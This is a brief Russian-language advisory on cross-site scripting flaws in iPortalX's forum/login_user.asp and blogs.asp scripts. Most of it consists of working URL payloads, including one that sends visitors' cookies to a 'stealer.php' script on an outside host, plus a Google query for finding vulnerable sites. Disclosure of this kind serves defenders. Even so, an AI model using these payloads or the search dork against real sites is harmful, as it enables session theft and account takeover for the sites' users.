Программа: iPortalX
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценариями forum/login_user.asp и blogs.asp. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Search XSS:
/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E
/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E
Получение Cookie:
Path/forum/login_user.asp?FID=0&Redirect=/login_user.asp ?Redirect=/members.asp?SF= %3Cscript%3Edocument.location=%22h ttp://www.mysite/stealer.php? cookie=%22%20+%20document.cooki e;%3C/script%3E
Blog XSS:
/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E
Google Search:
http://www.google.com/search?hl=en&q=%2Fforum%2Flogin_us er.asp%3FRedirect%3D%2F&btnG= Google+Search
